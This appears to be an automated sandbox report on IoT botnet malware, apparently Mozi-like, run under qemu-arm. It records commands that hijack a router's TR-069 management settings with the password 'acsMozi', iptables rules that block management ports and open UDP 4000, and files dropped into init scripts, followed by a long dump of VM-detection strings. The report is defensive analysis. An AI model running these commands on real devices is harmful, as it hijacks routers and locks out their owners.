Source: /tmp/bin.sh (PID: 7031)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""			Jump to behavior
Source: /tmp/bin.sh (PID: 7047)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""			Jump to behavior
Source: /tmp/bin.sh (PID: 7060)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7087)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7114)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7140)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7158)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7171)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7194)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7209)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7224)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7241)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7255)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7280)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"			Jump to behavior
Source: /tmp/bin.sh (PID: 7314)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7317)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7321)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7344)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7369)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7395)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7420)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"			Jump to behavior
Source: /tmp/bin.sh (PID: 7432)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"			Jump to behavior

Samples exit code indicates no error despite standard error output

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories

Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/S95baby.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/mountall.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/checkfs.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/umountnfs.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/mountkernfs.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/checkroot-bootclean.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/mountnfs-bootclean.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/bootmisc.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/checkroot.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/hwclock.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/hostname.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/mountdevsubfs.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/mountall-bootclean.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /etc/init.d/mountnfs.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /usr/bin/gettext.sh			Jump to dropped file
Source: /tmp/bin.sh (PID: 6792)	File: /usr/sbin/alsa-info.sh			Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34674
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34680
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34684
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34686
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34688
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34690
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34692
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34694
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 34696
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35276
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35278
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35290
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35292
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35298
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 35300
Source: unknown	Network traffic detected: HTTP traffic on port 32848 -> 8443

Executes the "modprobe" command used for loading kernel modules

Source: /sbin/iptables (PID: 6842)

Modprobe: /sbin/modprobe -> /sbin/modprobe ip_tables

Jump to behavior

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/bin.sh (PID: 6777)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/bin.sh (PID: 6792)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/bin.sh (PID: 6815)	Queries kernel information via 'uname':			Jump to behavior
Source: /sbin/modprobe (PID: 6842)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 7504)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 7526)	Queries kernel information via 'uname':			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_set_defaults
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/container.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_naming
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_foreach
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_getauxval
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_size_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_free_irqs
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_sem_timedwait
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/irq.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/mmap.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/envlist.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: Unsupported ARM syscall: 0x%x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtosz_suffix
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /usr/lib/x86_64-linux-gnu/qemu
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_free
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_ld_i32
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: arm926_initfnarm946_initfnarm1026_initfnarm1136_r2_initfnarm1136_initfnarm1176_initfnarm11mpcore_initfncortex_m3_initfnarm_v7m_cpu_exec_interruptarm_v7m_class_initcortex_m4_initfncortex_r5_initfncortex_a8_initfncortex_a9_initfncortex_a15_initfnti925t_initfnsa1100_initfnsa1110_initfnpxa250_initfnpxa255_initfnpxa260_initfnpxa261_initfnpxa262_initfnpxa270a0_initfnpxa270a1_initfnpxa270b0_initfnpxa270b1_initfnpxa270c0_initfnpxa270c5_initfnarm_any_initfnarm_cpu_initfnarm_cpu_post_initarm_cpu_finalizefnarm_cpu_realizefncp_reg_check_resetarm_cpu_resetarm_cpu_has_workarm_cpu_set_pcarm_cpu_handle_mmu_faultarm_disas_set_infoarm_cpu_class_initarm_cpu_exec_interrupt/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/gdbstub.carm_cpu_gdb_write_registerarm_cpu_gdb_read_register/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/crypto_helper.cdecrypt < 2helper_crypto_sha1_3reg
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: opt->desc && opt->desc->type == QEMU_OPT_BOOL
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_try_memalign
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_utimens
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_from_qdict
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_mutex_trylock
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: %s: %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_allocate_irqs
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_tty_echo
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_log_mask
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/oslib-posix.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_print_log_usage
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/translate-all.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: Unsupported syscall: %d
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_pipe
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_str_to_log_mask
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_size
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZN16QEMUDisassemblerD2Ev
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/crypto_helper.c
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_sem_destroy
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/i386/tcg-target.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu.sstep
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/gdbstub.c
Source: functions.sh0.8.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_init_exec_dir
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strnlen
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-input-visitor.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: err && errp != &error_abort*errp == NULL%s: %sCould not open '%s'errp && *errperror_free_or_aborterror_append_hinterror_setv/build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-error.cfname || cur_loc->kind == LOC_FILE!loc->prevcur_loc == loc && loc->prev%s:%d:loc_set_fileloc_restoreloc_poploc_push_restore'on' or 'off'a numbera sizen < sizeof(buf)%.17gNo description availableSupported options:%-16s %s
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qint.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_del
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get_number_helper
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_unset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: C/build/qemu-tYeErX/qemu-2.5+dfsg/util/unicode.clen > 1 && len < 7
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: Unsupported SemiHosting SWI 0x%02x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemufpa
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-visit-core.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_real_host_page_mask
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_ram_munmap
Source: functions.sh0.8.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: missing argument for option '%s'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.cPMSAv7 MPU #regions invalid %u
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.huse_icount%08x-%08x %08x %c%c%c
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_open
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: BlockdevOptionsGenericCOWFormatACPI_DEVICE_OSTqovqapi-event.cobj != NULLBALLOON_CHANGEBLOCK_IMAGE_CORRUPTEDfatalBLOCK_IO_ERRORoperationreasonBLOCK_JOB_CANCELLEDBLOCK_JOB_COMPLETEDBLOCK_JOB_ERRORBLOCK_JOB_READYBLOCK_WRITE_THRESHOLDamount-exceededwrite-thresholdDEVICE_DELETEDDEVICE_TRAY_MOVEDtray-openGUEST_PANICKEDMEM_UNPLUG_ERRORMIGRATIONNIC_RX_FILTER_CHANGEDPOWERDOWNQUORUM_FAILUREsector-numsectors-countQUORUM_REPORT_BADRTC_CHANGESHUTDOWNSPICE_CONNECTEDSPICE_DISCONNECTEDSPICE_INITIALIZEDSPICE_MIGRATE_COMPLETEDSUSPEND_DISKVNC_CONNECTEDVNC_DISCONNECTEDVNC_INITIALIZEDVSERPORT_CHANGEWAKEUPWATCHDOGqapi_event_send_watchdogqapi_event_send_vserport_changeqapi_event_send_vnc_initializedqapi_event_send_vnc_disconnectedqapi_event_send_vnc_connectedqapi_event_send_spice_initializedqapi_event_send_spice_disconnectedqapi_event_send_spice_connectedqapi_event_send_rtc_changeqapi_event_send_quorum_report_badqapi_event_send_quorum_failureqapi_event_send_nic_rx_filter_changedqapi_event_send_migrationqapi_event_send_mem_unplug_errorqapi_event_send_guest_panickedqapi_event_send_device_tray_movedqapi_event_send_device_deletedqapi_event_send_block_write_thresholdqapi_event_send_block_job_readyqapi_event_send_block_job_errorqapi_event_send_block_job_completedqapi_event_send_block_job_cancelledqapi_event_send_block_io_errorqapi_event_send_block_image_corruptedqapi_event_send_balloon_changeqobject_decrefqapi_event_send_acpi_device_ostuint8_tuint16_tuint32_tstringsInvalid parameter '%s'/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-visit-core.cinput_type_enuminput_type_enumoutput_type_enumoutput_type_enumvisit_type_int32visit_type_int16visit_type_int8visit_type_uint32visit_type_uint16visit_type_uint8/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-dealloc-visitor.cobj == NULLqapi_dealloc_end_listqobject_decref/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-input-visitor.cQMP input object member '%s' is unexpectedParameter '%s' is missingintegerqiv->nb_stack > 0An internal buffer overranQDictqmp_input_pushqmp_input_start_structqmp_input_start_listqmp_input_popqmp_input_popqmp_input_type_intqmp_input_type_boolqmp_input_type_strqmp_input_type_numberqobject_typeqmp_input_get_next_typeqobject_decref/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-output-visitor.cqmp_output_next_listqobject_typeqobject_decrefyestruean int64 value or range/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-input-visitor.cparse_type_intparse_type_sizeparse_type_boolparse_type_strparse_type_number%f"%s"<null>sov->list_mode == LM_NONEiBi < ARRAY_SIZE(suffixes)%lu (%0.3g %c%s)0x%lx-0x%lx%ld-%ld/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.csov->list_mode == LM_STARTED || sov->list_mode == LM_END || sov->list_mode == LM_NONE || sov->list_mode == LM_IN_PROGRESSsov->range_start.s < sov->range_end.sprint_type_intBKMGTPEprint_type_sizestart_listend_list@
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/thunk.c*type_ptr < max_struct_entriesid < max_struct_entriesInvalid type 0x%x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: opt->desc && opt->desc->type == QEMU_OPT_NUMBER
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_has_help_opt
Source: functions.sh0.8.dr	Binary or memory string: specify_qemu_cpus () {
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/cpu.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_reset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_vfree
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_RESERVED_VA
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_strtosz_suffix_unit
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_ld_i64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_SET_ENV=var1=val2,var2=val2 QEMU_UNSET_ENV=LD_PRELOAD,LD_DEBUG
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_%s_%s_%d.core
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/exec.cqemu: fatal: cpu_exec_init/build/qemu-tYeErX/qemu-2.5+dfsg/translate-all.cInternal error: code buffer overflow
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: cpu_write_elf32_qemunote
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/op_helper.c!arm_is_secure(env) && arm_current_el(env) != 3/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/internals.h!excp_is_internal(excp)cur_el >= 1 && cur_el <= 3el >= 1 && el <= 3
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_UNSET_ENV environment variables to set and unset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: Protecting guest commpageVFS: argc is wrong%Y%m%d-%H%M%Sqemu_%s_%s_%d.coreCOREunable to dump %08x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_set
Source: functions.sh0.8.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_get_cpu
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: tcg_gen_qemu_st_i32
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_validate
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZTI16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opt_get
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_CPU
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/signal.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/translate.c!arm_dc_feature(s, ARM_FEATURE_V8)%s access to unsupported AArch32 64 bit system register cp:%d opc1: %d crm:%d (%s)
Source: kvm.sh.8.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_loglevel
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: @/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/arm-semi.cqemu: Unsupported SemiHosting SWI 0x%02x
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_fdatasync
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_opts_do_parse
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu-arm version 2.5.0 (Debian 1:2.5+dfsg-5ubuntu10.32), Copyright (c) 2003-2008 Fabrice Bellard
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: host_start || host_sizeMultiple PT_INTERP entriesInvalid PT_INTERP entrycannot mmap brkmmap stack/usr/lib/libc.so.1/usr/lib/ld.so.1sp_auxv - sp == sizeunable to get current timestamp: %s/build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/elfload.cReserved 0x%lx bytes of guest address space
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object_interfaces.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/gdbstub.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu-arm version 2.5.0 (Debian 1:2.5+dfsg-5ubuntu10.32), Copyright (c) 2003-2008 Fabrice Bellardusage: qemu-arm [options] program [arguments...]
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_set_block
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: tcg_gen_qemu_ld_i32
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_thread_atexit_add
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.h
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_sem_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_fork
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_ram_mmap
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qnull.c
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: unknown option '%s'
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_sem_wait
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: QEMU_RAND_SEED
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-ppc64
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_register_reset
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu_cond_init
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: _ZN16QEMUDisassembler13ProcessOutputEPKN4vixl11InstructionE
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: 16QEMUDisassembler
Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmp	Binary or memory string: qemu: fatal:
